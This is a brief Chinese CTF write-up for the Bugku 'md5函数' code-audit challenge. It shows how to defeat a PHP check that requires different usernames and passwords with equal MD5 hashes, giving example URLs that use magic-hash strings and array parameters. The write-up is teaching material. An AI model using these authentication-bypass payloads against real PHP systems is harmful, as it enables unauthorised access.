Bugku - 代码审计 | md5函数

md5()函数

Bugku - 代码审计 | md5函数_第1张图片

http://120.24.86.145:9009/18.php

看代码意思就知道,用户名密码不能一样,且两者md5加密后值一样

这样就很简单了,直接将240610708和QNKCDZO分别对上述赋值即可。

即:http://120.24.86.145:9009/18.php?username[]=240610708&&password[]=QNKCDZO

关于赋值,不懂的此处可参考

https://blog.csdn.net/qq_42357070/article/details/81283153

 

方法二:就是md5()方法无法处理数组,直接构造payload:   

    username[]=1&password[]=2

即:http://120.24.86.145:9009/18.php?username[]=1&&password[]=2


 

你可能感兴趣的:(php,Bugku)